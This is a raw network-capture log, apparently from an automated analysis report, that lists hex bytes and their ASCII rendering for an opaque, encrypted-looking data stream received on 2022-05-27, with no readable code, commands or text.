                                                                                2022-05-27 11:26:33 UTC92INData Raw: 0d 4e 41 97 05 1b 2a a2 e3 3a 13 ac 88 03 9a 35 c7 c8 c9 b9 ef 99 5a a6 e6 70 34 91 49 94 e5 b0 8e 67 37 b4 67 4c 1f da 29 cf e8 db 26 76 48 fb 26 47 6c d2 49 ec 1c 51 dc d5 b7 3c d0 87 3e a8 55 20 d2 2d 74 94 e7 b6 d8 52 71 06 05 38 9e 4b 27 00 40 c5 2c c4 94 66 1a 68 ff 63 9a 4a 2f a4 38 8b c0 ab eb d8 f1 1f ab a5 9c d3 6c 85 f0 76 77 ba 4e 41 e6 ab 2c 30 d5 1c b7 70 a3 8c 51 36 d9 55 24 60 63 77 a3 bb 19 89 07 7f 38 2c e8 51 43 58 81 0b ef 1d 88 7c b2 56 05 95 e2 3d 1c ed 5a c1 d0 f6 d0 fa ae 5b 8b 59 a8 ef 31 8b 56 82 71 74 fb b3 36 d5 38 ca 86 cf fd fa 60 8d 86 22 43 69 ed bb 4b 5a 3f 4a 6a 33 0a 61 c2 71 6c 13 0b 0c 49 be c1 cd c1 02 06 fd 2d 59 a4 62 c1 3c 39 60 d1 ac aa 39 4f ec c8 cb f5 55 2e 94 a9 1b c7 2b c2 7c 86 ac 2c d8 69 67 34 42 b8 90 39
                                                                                Data Ascii: NA*:5Zp4Ig7gL)&vH&GlIQ<>U -tRq8K'@,fhcJ/8lvwNA,0pQ6U$`cw8,QCX|V=Z[Y1Vqt68`"CiKZ?Jj3aqlI-Yb<9`9OU.+|,ig4B9
                                                                                2022-05-27 11:26:33 UTC93INData Raw: 03 a5 22 12 b3 e5 3d bc 02 93 31 67 5e 98 9b 14 4c 0e ad 3d c3 11 f6 0b 4b fe 2d 76 be 1c ae bd 1a b2 43 67 81 fe 10 d4 e9 e9 e6 53 77 44 1b c7 58 1c 0e ce 46 4b e6 0f 1e 93 29 c7 14 29 d9 9a 52 b2 3b 2b fd 30 d6 f1 9a 69 3e e5 49 a7 83 2d c1 61 5e bd 80 c0 c7 f6 8b 98 92 e0 d9 f5 ad f7 5b 5c a5 8e 2f bd 45 76 22 01 c2 b6 cd f1 f8 f1 9f 09 13 c3 04 3d 5d 05 7d 91 50 71 4d 2f 22 a5 0c b5 1e 33 d3 ec 42 62 75 16 9d da 76 2d 4c 38 b0 30 8e bf 94 38 71 27 ed 85 43 6e 23 24 cd 76 8b 6d 6c 3f fe 8b ff a8 28 1a 3f fc 5c 73 d0 18 86 e1 f0 b5 31 4c 29 58 69 7d 11 84 bc 07 7e a7 a8 8a 96 cc 75 b1 bf ba 59 e6 ec 12 94 9d 28 7e 9d 7a 7a 89 65 ca e0 cc 35 97 c8 1a 1a a1 c2 59 be 7c d0 54 fd ae ab 3a 51 b5 62 02 ff 8a 89 0f ee ab ae b2 39 ee f0 c2 18 8c 0e f8 8c e9 f0
                                                                                Data Ascii: "=1g^L=K-vCgSwDXFK))R;+0i>I-a^[\/Ev"=]}PqM/"3Bbuv-L808q'Cn#$vml?(?\s1L)Xi}~uY(~zze5Y|T:Qb9
                                                                                2022-05-27 11:26:33 UTC94INData Raw: e9 eb 43 08 b6 b1 3d 50 41 0c c2 c8 84 7d a9 35 fa 5a d6 bc c4 79 86 e3 52 72 44 c2 8c 76 c7 ae a4 fb d4 67 e0 20 22 29 9d 99 33 68 fb d2 84 18 7a c9 ec 7d 16 37 1d d2 96 ad 9c 24 3b 28 3d df 19 99 63 de 4f 35 47 43 75 f0 74 ab fe 4a 21 4f 8b f5 41 81 a1 75 26 0b 83 36 bd 4d 82 fa 85 ee 62 74 4a a0 a7 52 df b4 bb 87 dd 9f 5a 68 4f 5a 79 05 08 9a 3b 5e 6a 8e 5d 69 7c 07 ca 83 5b 34 27 97 f6 5a a0 46 38 23 35 c7 87 fb 3a dd 29 78 78 a0 ae 6a b1 6b 54 68 5d 4f c6 60 17 c0 7e 43 28 ef 74 10 1b 7e 4f 12 84 83 b7 eb eb 42 6d e1 4a 09 b7 93 b1 bb 2a 5a e3 66 d3 2c 64 27 a7 b7 95 de 20 68 02 3a fc ce 0a 4c 55 ec 16 fc 33 76 c2 c2 5e 61 73 75 71 3b 16 ae c1 97 a2 02 da b5 7d 53 ae c5 4b 74 eb b9 bd f7 83 fe 34 91 6b b3 ff 1d 87 fb ba 64 07 b9 15 7b 73 4d 3b 91 15
                                                                                Data Ascii: C=PA}5ZyRrDvg ")3hz}7$;(=cO5GCutJ!OAu&6MbtJRZhOZy;^j]i|[4'ZF8#5:)xxjkTh]O`~C(t~OBmJ*Zf,d' h:LU3v^asuq;}SKt4kd{sM;
                                                                                2022-05-27 11:26:33 UTC95INData Raw: b1 86 fd 08 84 56 0b ba bf ef 47 cd d6 6e b3 8f ac ee 65 2f 03 7c bc 31 b1 9d 68 0e 21 75 5a 85 e3 f9 d8 fe 4d 3b 7b 78 d4 ba 56 63 f2 75 71 0d 54 c1 eb 10 2d d5 96 05 33 42 28 13 26 e9 85 e2 ac bd 19 61 03 1d 3d 06 4b 26 37 02 d7 b0 d3 fe a8 11 7e 65 5f 98 53 29 6f a4 9b c5 b4 f1 df 69 61 7c bb 91 c3 e7 4e e6 66 6a a9 ea 9f e3 b4 23 37 4d 1c b7 09 1a 5e 50 3c d7 29 fb 70 67 6c a4 ba 74 d4 b1 10 e4 3e ef 53 66 42 d2 0b e9 06 87 3b 5d 57 05 95 c0 da 39 c8 78 d5 59 f6 da e9 bb 4d a7 a7 a8 ed 37 a9 b7 83 73 72 e7 e1 45 f9 3e c4 fa 9e ec fd 42 c2 aa d8 44 41 79 95 4d 76 28 7e 11 33 0a 67 c7 7a da a5 23 66 56 be cb df c8 13 1b d5 05 8f a4 6e e9 fc 38 60 c4 8f a7 28 61 c7 5d cf 29 53 06 17 bb 08 cc 05 f0 04 86 ac 2a da 6c 0b 12 bd b9 ba 68 17 c0 1c ae ed d8 0e
                                                                                Data Ascii: VGne/|1h!uZM;{xVcuqT-3B(&a=K&7~e_S)oia|Nfj#7M^P<)pglt>SfB;]W9xYM7srE>BDAyMv(~3gz#fVn8`(a])S*lh
                                                                                2022-05-27 11:26:33 UTC97INData Raw: 5b d8 8c 33 6b 4a b0 5e 1c 55 fa 84 87 cb 39 47 27 68 f8 d3 77 b4 6f a1 ac 12 b8 58 70 be 7f c1 d5 c5 e2 e4 59 71 91 1e dd 72 8d 0c c9 51 7a 0e 17 e0 92 99 c6 18 28 96 94 53 b2 31 a2 ac ea 31 11 55 ec 3c e2 53 96 01 32 cb 9f c3 80 85 d9 c9 9f 86 9a 9b e3 f2 77 a5 f7 4a c8 ab 90 cc 9c ca 7c 33 05 49 71 d1 eb c7 75 8c 01 13 4e 1d 2d 52 f2 63 e2 de 69 53 34 39 80 ef b3 c4 1b 3a ff 4d 77 e3 16 bb 55 6f 22 42 3c 86 5b 8f 93 97 b3 73 20 f2 99 6b a0 30 da cc c6 98 49 76 09 b0 ba 00 57 21 f5 43 f1 43 76 e5 30 18 d8 ec 9a 26 53 48 c7 78 72 d0 95 9c c8 68 b4 a2 2e 87 c0 6a a3 a0 d5 cf e8 e8 f3 86 ae 62 e4 a4 fd 67 9d 70 24 53 dd 3a 89 ce 00 3d 31 c0 5c a1 7b fa 9e ec 50 aa 8a 49 82 a0 17 df 71 96 1d fd 3d bf ac 2c e9 df e7 19 a0 07 5c 56 e4 ef 17 4a 85 1e 44 50 f5
                                                                                Data Ascii: [3kJ^U9G'hwoXpYqrQz(S11U<S2wJ|3IquN-RciS49:MwUo"B<[s k0IvW!CCv0&SHxrh.jbgp$S:=1\{PIq=,\VJDP
                                                                                2022-05-27 11:26:33 UTC97INData Raw: 9c 2f d6 b5 44 d0 84 6d 45 67 e5 c9 e5 e5 89 f8 23 8a 7c c7 c6 1d ab fc 75 63 51 1d 3a 7b 79 54 2f 85 21 d2 01 f4 22 aa 3d af 4f e4 11 7b 04 bb ad 7a 42 ba c3 fe 4c 04 84 b8 c2 0e ff 30 62 fe 3c 76 aa 65 45 be 36 b1 71 ef a1 73 3f cb e2 fb ff 5c 77 41 13 26 6c ac 13 c7 79 e0 04 0f 14 80 b3 c9 12 22 f3 1f 43 b8 24 ba 12 3e e3 e7 92 84 2f ea 53 98 07 3e cb 61 d3 a6 90 c8 26 9a 3b 8f b6 9e e6 70 be fd 5b d1 be 9e 20 63 e7 5a 33 07 76 2e c0 ef d2 eb ce 09 13 5e 06 37 5d 1f 71 c4 cc 71 48 2f 31 7b ff 99 18 18 76 e2 57 6e 74 09 bb 4c 78 32 ad 35 bc b4 88 97 19 a6 60 22 7e 62 63 bf 22 37 c8 f5 8b 71 79 31 cf 4e e9 56 29 aa 2d e4 50 76 cf 3f 10 ef e0 54 20 7f 5a ef 7d 4a f5 69 63 26 6f a2 82 0d b7 c9 6a eb a1 c4 c5 28 e3 0d 96 9d 63 6f a3 75 65 9c 69 ae 6d db 2c
                                                                                Data Ascii: /DmEg#|ucQ:{yT/!"=O{zBL0b<veE6qs?\wA&ly"C$>/S>a&;p[ cZ3v.^7]qqH/1{vWntLx25`"~bc"7qy1NV)-Pv?T Z}Jic&oj(coueim,
                                                                                2022-05-27 11:26:33 UTC99INData Raw: b6 2d 9f 7a 75 42 db e6 59 06 17 a7 03 3f 3c c6 0c 9e 21 32 cb 61 15 1c 46 a1 85 20 1e ca 9b a9 e0 26 0e b3 28 e9 fa e9 50 0e 8d 80 3d 41 41 2a c0 37 85 51 ab 0c 1b 4a d0 2c e1 f2 8c f0 5e 61 51 d9 97 6d b4 f5 88 f7 dc 5c 84 30 2e 35 91 9a b1 74 e4 b7 bc 08 70 dc ea 8a 04 15 07 c8 b3 ac 51 24 31 04 21 ce 04 87 f3 cd 5b 2e 5d 38 8c f0 58 ab f8 7c 33 44 29 f3 5e 94 a3 7a 0e bc 8d 29 b5 9b ba d7 8c dc 07 11 a6 59 a9 58 dd b8 93 6c d6 84 a2 06 29 5c 68 0a 2c 20 2c 54 6c b7 ad 77 6c ff a4 e5 41 25 29 ac 42 4f a6 57 9d 5a 35 c7 8c c0 0d cc 25 64 5e ef cc 84 42 1b 7d 7a 57 45 c0 f0 1d 38 6e 66 1b 59 75 06 35 11 75 13 82 a1 8f 70 f8 42 54 53 66 ae b5 bb 94 93 13 51 41 76 d7 bc 77 31 de 9a 6a df 0a 78 1d 38 fe df 1d 29 0b fb e8 fb 0e 7c f8 cd 09 72 8c 8a 88 2c 71
                                                                                Data Ascii: -zuBY?<!2aF &(P=AA*7QJ,^aQm\0.5tpQ$1![.]8X|3D)^z)YXl)\h, ,TlwlA%)BOWZ5%d^B}zWE8nfYu5upBTSfQAvw1jx8)|r,q
                                                                                2022-05-27 11:26:33 UTC100INData Raw: a9 73 aa ab a0 58 37 7a 15 df 70 9a 07 ff 3f a9 ac 20 ee 08 95 49 8c 0e 65 3f f7 e7 00 4d 19 5c 4e 50 e5 b2 08 22 bc fd 31 21 1c 5c 03 90 17 fe 47 cd b3 fa b5 88 b2 ce f4 3b 8e 55 a4 bc b7 8e 6d 1e 37 6b 5d 11 e4 e7 de ee 07 a6 2f 60 c2 27 e5 77 e3 74 f1 0d 57 0d e6 9d 3a 06 57 9f fe 53 2d 0e 92 64 9c f3 a5 bf ad e8 06 03 21 b2 4b 23 28 01 d2 2b d3 ff 9f bc 68 f9 44 82 5c 0a e8 3a 8a ca ba fb 13 e2 aa 66 8b 8d d2 53 f8 e3 79 6e a0 66 a6 77 a9 2c 2b 07 12 8b 3b 16 4c 55 3e ce 43 0a 04 65 66 ac 20 2c 5a 06 7e 16 cc ef 59 61 66 92 0d fe da 9d 52 85 50 14 96 f4 3a e3 12 af f0 71 51 d0 fa b5 56 7d da 84 c2 37 a3 ce ae 8b 73 ed 9d 47 fd 16 cc 95 c9 32 fd 4e 34 82 22 04 5d 7f bf 4b 5c 29 62 11 33 0a 67 ab 7b 7d 18 59 72 4b be d9 de ca 13 10 d5 b9 5c bf 54 ee fc
                                                                                Data Ascii: sX7zp? Ie?M\NP"1!\G;Um7k]/`'wtW:WS-d!K#(+hD\:fSynfw,+;LU>Cef ,Z~YafRP:qQV}7sG2N4"]K\)b3g{}YrK\T
                                                                                2022-05-27 11:26:33 UTC101INData Raw: 72 41 54 78 d6 fe f6 1f e9 35 9f 6c c3 44 80 96 f6 7b 7b 34 0d 29 7c 6c 56 3e 06 2c c6 14 e6 25 3c 33 a6 ae f6 2b f6 13 94 3f 6c 54 2c 5e 13 53 11 93 37 d6 16 ef 35 48 01 2d 7c b5 f3 aa b8 05 af 5f e4 b0 74 20 cc ff 74 e4 5b 79 52 2d 58 6d 80 1f 5d 40 6c 19 15 08 0f a4 d1 04 2a ef 83 43 b5 24 ab fa a3 de e9 b5 e8 0f 6a 53 87 09 b1 d0 66 dd b2 af 5b d8 9b 17 15 8c fb e6 7b bb 6b 4a c7 ab a1 12 62 e6 76 22 9d 4f a0 dd ce ce fb 8e 0e 0c 7d 03 ae 53 0b 7d ed da fc 53 37 37 a1 de 35 1e 33 4f 61 5c 7a 61 2c bc da 76 25 4c 12 b0 25 8e bf 94 38 71 2f ed af 75 23 32 23 d2 c2 ba e2 73 31 de d8 ee af 37 af 0e 73 43 7c cf b2 0b f7 e0 80 37 cf 49 c3 67 59 18 09 8d de 61 8b be 8a 96 c4 75 8e 80 44 c5 f7 e3 91 96 85 6c cc ac 8a 65 9d 7a 34 6d da 25 a7 cb 99 33 3a cc 66
                                                                                Data Ascii: rATx5lD{{4)|lV>,%<3+?lT,^S75H-|_t t[yR-Xm]@l*C$jSf[{kJbv"O}S}S7753Oa\za,v%L%8q/u#2#s17sC|7IgYauDlez4m%3:f
                                                                                2022-05-27 11:26:33 UTC102INData Raw: dd 90 02 06 ab 04 d1 15 7b 05 86 a6 39 cc 63 03 3c 55 ac 9a 3b 14 d7 85 a5 e7 f0 cb 9b 2f f9 f6 f1 67 91 9c 8a 37 43 4c 36 a5 ce 85 7d ab 71 3f 5b d6 b6 ec ed 87 e3 14 3a 68 41 8a 61 40 dc 92 fb d5 7e 5b 22 27 29 91 9b bf 70 e0 67 ab cf f7 92 e1 74 04 34 1d d0 92 82 8b 37 2b 3b 27 fa 28 9d e8 c6 49 35 4a 34 1d f9 75 a1 e3 65 34 ba ab f7 41 8b 2e 61 06 b5 51 25 b3 74 b0 ec 53 f7 7f ff 52 b7 a6 66 14 bb 1d ca cb 45 4b d1 88 0b 79 0f 21 2f 3b 4f 68 b0 ae 7e e8 10 a2 a8 c5 3d 3a 95 fb 5c af df 02 6e ef ef 70 e8 36 c6 0e 5a 6f 6e 84 63 65 13 b6 7e 8b c8 80 fa 04 c7 7c 46 08 5e 61 1c 0b 5e f8 a4 ac 7f a1 71 f2 40 6a f9 6e a6 3d 24 bf 1d a4 73 15 6c c4 bc 63 2c c5 80 98 ca 35 77 03 a5 43 d7 82 94 24 29 1f 74 95 69 09 df e7 d1 23 75 77 2b 0d ba d1 f1 13 b4 cd 69
                                                                                Data Ascii: {9c<U;/g7CL6}q?[:hAa@~["')pgt47+;'(I5J4ue4A.aQ%tSRfEKy!/;Oh~=:\np6Zonce~|F^a^q@jn=$slc,5wC$)ti#uw+i
                                                                                2022-05-27 11:26:33 UTC104INData Raw: 65 7a d7 70 89 05 f1 27 97 60 27 f6 da 31 4e 8e 0e 6e f2 50 ee 17 5f b3 11 5d 54 e4 01 1d 33 56 e8 09 07 92 5e 6c 9d 3e ef 4d d5 63 e4 bd 95 b5 e2 7a 2e 8a 49 42 30 9c 86 55 62 db 9c b3 02 e1 f8 cf f9 d5 3c 80 61 ee 25 50 75 ef 63 fc 18 4f 25 fc a0 3e fb 88 2b f7 ac d2 f0 37 1a f7 e7 b1 a1 af 70 1d 33 2e 9a c7 23 28 0b 30 2c c2 ea 9f 2d 69 f9 44 9f 64 98 78 38 8c af f9 fd c9 ff 7b 7e 2a 2b c2 a1 48 35 f4 4b bf 76 8f ea a8 3a 0f d9 2d 85 43 cc 5f 5a 1d d9 66 b8 5b 67 66 ac ba 71 d4 b1 68 e4 2c ea 4a 6f 41 ba 03 f8 08 89 45 90 c7 03 81 a9 65 34 7e 51 f8 53 e0 41 66 b8 4d a7 59 aa 39 17 e2 45 86 71 aa cd ea 7c d5 38 1a 9f c5 c4 6e 49 1e 88 34 6d d5 7d bf 41 56 38 66 06 e5 19 63 c0 7e 6c 1d 12 b2 95 ac e3 f3 ca 13 07 fd 43 5c a4 62 e4 d4 16 60 d7 b5 7d 24 60
                                                                                Data Ascii: ezp'`'1NnP_]T3V^l>Mcz.IB0Ub<a%PucO%>+7p3.#(0,-iDdx8{~*+H5Kv:-C_Zf[gfqh,JoAEe4~QSAfMY9Eq|8nI4m}AV8fc~lC\b`}$`
                                                                                2022-05-27 11:26:33 UTC105INData Raw: 83 f2 ec 8a 6b f0 3e 14 e8 1d 65 6b 28 4d 3f 51 73 47 28 9b 7d c1 0b f6 33 26 22 ab 21 e5 31 6a 02 93 20 7a 42 cd 4f 35 d2 04 89 ab c7 11 f0 21 68 d9 2d f9 19 6f b7 bf 1a b8 49 78 a1 77 3f 62 53 e8 fa 41 66 4b 0c da 6d 84 1f 04 98 6b 0c 0f 1e 93 b5 c5 2b 35 f9 99 52 b2 3b 43 ec 3f de f8 a7 cd 54 ea 53 87 09 24 d9 9f c3 80 86 c1 55 b4 17 89 9c f6 e0 69 ad fe 42 3e b5 ad 20 9f e0 60 24 8f e9 c8 ff ee d8 6d 99 87 a4 71 1c 28 4f 0c 6b d5 32 61 6e 15 2e 93 d6 73 1f 33 45 ea 97 6a a8 84 85 46 67 23 58 36 97 b3 89 31 23 cb 5d 29 f2 82 64 31 94 0a e1 fe b0 7e 7e 31 d7 53 01 a9 04 84 36 fe 43 75 d5 d0 1b dc fb be 0b 48 55 c4 71 64 f0 94 b0 db 69 aa a8 1f 9b 3d 6b 8f a2 ef c7 dc 60 0a ad 82 73 f1 bc 76 65 a6 7e a8 7c 38 3a 88 cc 25 b2 3d d3 56 2c 45 f0 81 fc a4 ad
                                                                                Data Ascii: k>ek(M?QsG(}3&"!1j zBO5!h-oIxw?bSAfKmk+5R;C?TS$UiB> `$mq(Ok2an.s3EjFg#X61#])d1~~1S6CuHUqdi=k`sve~|8:%=V,E
                                                                                2022-05-27 11:26:33 UTC106INData Raw: 3d ea 07 99 de b6 cd 41 9b 0f 43 b8 89 43 82 dd 11 8b ec d8 0b b5 31 ec d9 e6 4f e3 9f 8a 3d a5 4b 35 db df 97 76 99 c9 1d 5b d6 b6 fd e6 98 ea aa 60 6c d9 9f 66 59 fe b7 f3 ca 7e ff 3a 2e 2e 89 8b 50 78 db b7 be 31 35 c3 e1 7e 09 20 18 ca 9b 84 5a 3d c5 29 00 d8 7b 81 fb cd 40 29 58 3f 79 f1 65 aa f6 71 da 93 16 ea 50 86 b6 61 06 37 af ff bf 65 bd d3 4f e0 74 e8 4f 8e cd 57 ce b4 fc 40 dd 9f 5a 18 09 49 72 0f 31 37 20 53 92 a7 8b 41 6d 06 a3 d8 53 ae 05 4f fb 4b a0 79 79 7d 35 c1 90 c0 4d cc 25 68 4f 0e 32 7b b7 2c a9 68 5d 43 be c5 05 c6 69 55 0e 5b 7b 10 0c 5d 61 ed 85 a5 a2 69 eb 43 7c f9 69 b4 4d 92 9b 99 60 60 e2 6c c2 a5 70 3b c7 87 94 cf 2d 64 1a d5 f5 f3 06 32 1c fa c0 e9 2a 61 c2 db 3a 5c 63 7e 6a d4 1f 93 c0 fe 8e 0a c4 a0 67 5b 97 66 50 7e 13
                                                                                Data Ascii: =ACC1O=K5v[`lfY~:..Px15~ Z=){@)X?yeqPa7eOtOW@ZIr17 SAmSOKyy}5M%hO2{,h]CiU[{]aiC|iM``lp;-d2*a:\c~jg[fP~
                                                                                2022-05-27 11:26:33 UTC108INData Raw: 35 bf bb 30 de e0 19 18 86 18 57 96 ef c7 c3 51 95 0b 21 0b e4 10 13 2d b9 e5 4a b9 85 5c 09 b2 ea eb 47 cb af c1 81 8f a6 ec 6c 0c 85 5a 94 e7 b4 8e 6b 70 7f 63 4c 13 f5 ed c3 87 61 2b 7e 6a ea f1 43 66 ed 75 c5 2c 51 db f7 9a 0f db 84 3b 77 57 2d 09 5f 2e 94 e7 bb ac 94 7c 69 b3 2a 9a 50 0b f1 0f c1 2a d4 d3 87 1b 68 f3 58 ae 47 2b 51 e2 8e c0 ad 92 92 f5 70 73 8c 47 d1 7b 59 e4 68 68 d0 c6 8f e6 a1 43 44 d3 0d b8 73 ff 51 59 31 ce 4a 4d c1 66 66 ac c3 2d 5a 06 75 2f 33 f8 8f 78 66 92 07 f8 1f b0 5c 6b a9 fa 96 d9 00 0a e1 41 fc 71 3f d1 fa b9 7c 5c c8 ac ef 04 ab d5 82 59 bb ec 9b 4b d9 29 c8 84 c7 fa 92 f8 1f 82 28 2a e7 7d bf 41 7a 38 66 00 37 1c 08 61 7b 7d 12 4c d5 49 be c1 f8 db 17 1c d1 af 32 14 65 e9 f6 57 c6 d5 bf a9 0e 59 c0 4c cb e3 3c b6 07
                                                                                Data Ascii: 50WQ!-J\GlZkpcLa+~jCfu,Q;wW-_.|i*P*hXG+QpsG{YhhCDsQY1JMff-Zu/3xf\kAq?|\YK)(*}Az8f7a{}LI2eWYL<
                                                                                2022-05-27 11:26:33 UTC109INData Raw: 30 85 da 66 40 98 87 52 70 65 43 3f 40 30 cd 20 e0 34 be 40 a3 ca db 3c 6a 06 90 28 ae d3 de 2f 1f 44 13 53 a7 cf 18 c1 cb 6f d4 3e 4c b3 6f d5 b3 1a b8 b4 78 a1 62 29 c7 e6 d0 95 50 66 4b 0d c9 62 9f 2b 3f 50 47 56 0d 65 d2 b4 d6 1f 39 e8 1b 84 3d 60 b7 ec 3d e7 45 a8 f5 25 e8 28 b9 08 2d c5 67 b1 00 8d db d2 8a 12 fa 30 fe f9 6e 85 59 59 c0 be 88 24 0b 95 db 20 01 54 8f 6c ed d8 6d b7 a6 11 5f 1f 3b 55 9a d5 a1 14 60 42 3a 55 ce ff b5 1a 2c 7a ee 42 7d 6f 06 b5 6e 99 23 7f 15 92 de ce be 94 a0 13 84 f0 88 69 a7 49 57 60 e8 9a 68 5b 81 dc 44 f5 be 68 bb 2c f3 43 63 e6 3d 15 f0 ee a5 3e 41 a6 c5 54 3f 0c ee dd d8 7e a3 a0 07 83 15 e5 f8 a0 c4 c7 f5 e5 81 20 82 73 e3 9d 7d 63 11 dd a8 7c dc 12 70 dd 05 28 15 20 56 a1 60 e7 0d ac ae ab a7 68 49 7d 15 d5 59
                                                                                Data Ascii: 0f@RpeC?@0 4@<j(/DSo>Loxb)PfKb+?PGVe9=`=E%(-g0nYY$ Tlm_;U`B:U,zB}on#iIW`h[Dh,Cc=>AT?~ s}c|p( V`hI}Y
                                                                                2022-05-27 11:26:33 UTC110INData Raw: 70 1b 10 48 46 97 06 17 e3 97 b3 ed d8 10 93 3c f0 e9 f0 40 17 60 8b 11 53 53 26 c5 c9 95 72 be 3c e2 5a fa bf d4 cb 79 1c ab 7e 62 c0 87 61 5b fb bb c2 2b 75 c0 10 2c 44 c2 92 ae 7d 84 11 be 19 70 db 8b 07 a8 3b 0b cb b3 25 53 24 31 3e 6c f9 f5 6b 06 d2 70 37 4d 2c 63 fe 6b ad 17 7b 08 a3 38 f6 32 2d b2 70 04 b3 ed 45 16 67 bb f1 ad 4a 76 ee 53 b7 b2 4f 16 c1 20 7f dc 95 74 a9 07 5a 73 27 8f 3e 3f 54 74 c9 69 69 7c 07 af d6 56 27 22 84 ee 44 b9 1a 4b 78 19 ca 97 e4 27 c2 1b 6c 9a 1f cc 64 f1 17 63 69 4c 4a ce bc fa c7 43 57 03 3b dc 12 1d 5c 69 77 ee fa 0c 73 f8 42 54 58 60 ae b9 85 f7 ce e8 a4 1c 73 83 a5 78 20 c5 83 8a 20 27 57 03 13 7c 22 f3 dc 0b e4 05 f5 22 6f dc d7 1e a2 73 59 7e 12 87 be c6 f8 82 33 c9 bc 6c 4a 89 72 78 8a ec fa 89 f4 f8 b9 33 80
                                                                                Data Ascii: pHF<@`SS&r<Zy~ba[+u,D}p;%S$1>lkp7M,ck{82-pEgJvSO tZs'>?Ttii|V'"DKx'ldciLJCW;\iwsBTX`sx 'W|""osY~3lJrx3
                                                                                2022-05-27 11:26:33 UTC111INData Raw: 5d 77 f1 9b 82 a6 fc 18 55 84 02 51 60 1a 11 35 0b aa 92 65 08 84 58 70 36 3d ef 4d d5 d3 9a 1c 8d a6 ec 52 8f 8c 53 b6 27 f0 6e 95 e0 db 7c 7d 0a fd fc de e7 ce 14 80 61 ee 2c 56 62 fc b5 fe 18 4e e4 ee 83 3c c1 82 0c 89 ad 2c 23 73 77 ef a6 b0 ab 81 78 17 07 fd 15 01 23 28 09 e9 1a c3 fb bd 19 13 c7 4f 9d 48 24 0a 94 88 c0 a1 ec cc 86 dd 7b a4 96 fd d5 5d e3 73 4c 10 74 8e ec a2 3a b7 66 62 6a 66 cc 55 2d 7c de 46 26 6e 40 75 a9 ac 67 55 19 56 c0 3e c3 1a 69 11 c2 0a e9 08 86 45 90 80 8a c4 ca 04 1e c5 95 f9 59 fc d2 81 81 5d a3 cc aa 9c 9b a1 c4 8c 60 77 9e 36 4f d5 32 e4 3b c1 ec f7 60 b1 80 22 4f 48 69 29 fc 33 f1 62 11 39 77 2d d0 7a 79 07 09 60 44 be da d1 d5 06 f3 d4 95 50 b5 6c c1 ed 38 60 dd ac a5 37 5e d7 52 cf e4 5c 19 22 53 1a ed 34 fb 0e 9c
                                                                                Data Ascii: ]wUQ`5eXp6=MRS'n|}a,VbN<,#swx#(OH${]sLt:fbjfU-|F&n@ugUV>iEY]`w6O2;`"OHi)3b9w-zy`DPl8`7^R\"S4
                                                                                2022-05-27 11:26:33 UTC113INData Raw: 3c 64 7a 2d 16 0f 3d c1 0b f6 22 a5 33 a6 99 06 3d 6a 08 1c 79 78 42 b2 34 52 4d 04 81 c4 0a 10 f0 25 44 c3 3c 79 a4 68 93 5c 1a b8 43 f7 f8 73 3f d6 f8 ed e4 5b 4e a8 0d d8 67 0f 46 c1 51 69 7d 49 1f 93 b1 c9 16 5b 23 73 71 b2 3b b7 ec 3f cf ee ea ae 07 dc 53 87 03 94 bc 24 c3 ac 8b f0 b4 8a 12 98 9a d4 1a 64 ad fd d4 99 b4 81 30 8c e3 67 25 29 bd a7 c2 e5 57 3e 9f 09 11 24 53 33 42 08 7d c2 a6 ba 2e 13 28 85 fe b5 1e 33 4f bd 16 55 48 09 aa 4c de 5f 16 35 90 a1 a5 90 85 a1 71 2f da 6b 63 bf 29 ab 94 ea 9a 60 71 4a 9c 45 ff ac 39 83 3f f4 6b 9f cf 2e 10 7f a6 aa 21 51 23 82 79 72 0a 22 0d b7 03 e2 a9 16 83 d2 61 2f f5 c4 c5 f6 f2 04 96 8e 5b 1a 8c 75 6f b5 89 a8 7c d7 2d 04 8c 05 22 3c fb a5 a1 6a fa a9 64 ae ab ac 53 b1 6c 12 c8 fd d8 0f ee 36 97 4e 26
                                                                                Data Ascii: <dz-="3=jyxB4RM%D<yh\Cs?[NgFQi}I[#sq;?S$d0g%)W>$S3B}.(3OUHL_5q/kc)`qJE9?k.!Q#yr"a/[uo|-"<jdSl6N&
                                                                                2022-05-27 11:26:33 UTC113INData Raw: eb c0 75 78 7e d3 ca 4a 14 73 75 73 3b 13 97 f0 f9 9d 09 d8 c8 52 5a 86 69 48 07 41 d4 fe fc 92 f0 41 2d 61 dc 32 34 29 f3 64 61 33 95 4b c8 71 47 22 b2 93 c3 0b fe 1b 0f 20 a1 bb f4 38 7b 0f 1c 79 78 42 b2 34 51 4d 04 81 1c a8 c9 f0 23 62 5c 06 28 b7 14 f8 be 1a bc 40 69 a7 a5 b0 8e e9 e8 f7 27 2e 4a 0d dc 7c 8d 1d c6 22 c7 04 0f 14 82 bd a5 b6 33 f9 15 7a 1c 39 b7 e6 2e cb 9d 19 f7 2f e0 7b 29 0b 2d cb 49 6d ae 8f d1 c9 9e 06 84 12 a5 f9 64 af 8c 1e c1 b4 85 85 f2 28 77 22 07 76 1f c0 ef d2 c5 8e 0d 79 4e 10 23 4f 83 3b ce cc 62 39 75 29 85 fa 63 a9 20 4b ec 40 6a a8 1a a7 57 6a 33 41 0a 05 58 71 40 85 a2 77 fe e1 8e 72 b9 32 35 f3 8c 60 9d 8c 09 d7 45 ff a8 2a fd 10 f2 43 78 cc aa 8b eb bf 50 21 53 58 c6 7b 01 a2 97 9c d3 67 cd db bb 85 c3 60 8b 0e c6
                                                                                Data Ascii: ux~Jsus;RZiHAA-a24)da3KqG" 8{yxB4QM#b\(@i'.J|"3z9./{)-Imd(w"vyN#O;b9u)c K@jWj3AXq@wr25`E*CxP!SX{g`
                                                                                2022-05-27 11:26:33 UTC115INData Raw: 5a b6 f5 93 34 ec f2 d7 bb 26 e5 65 e9 f8 3f ef 8c bf a3 2a 33 89 5c cf f1 44 6c dc af 60 fe 3c ea 03 e8 74 90 a4 b1 15 0f 45 92 85 1a 1c db bb b6 ed d8 09 9f 2f ee ff ea 64 1b 9e 8d 2a ae 4a 19 c8 d1 8f 7d a6 0b e2 5a fa b4 fb e6 87 e4 4c 9f 41 ff 8a 4a 48 df 47 f9 ae 37 ed 31 2a b1 35 b9 ae 79 e4 8d bf 19 0f c3 e1 74 0d 39 0b d0 8d 9e 7a 7f 3b 2f 36 2f 09 b8 e3 c9 48 5f 01 2d 72 f5 77 2e b3 7a 24 90 41 bd 40 81 b4 fe b9 9f c7 22 91 7e b0 fb 82 f3 8a ef 75 a4 ae 5c ce b5 8b 83 dd b3 51 04 07 21 3a 0e 20 38 b1 e9 5e 6d be 63 7c 06 bc 37 5a 18 29 90 d5 51 ad 51 b2 6f cb c6 aa ea 21 c7 25 69 7c 1e 32 57 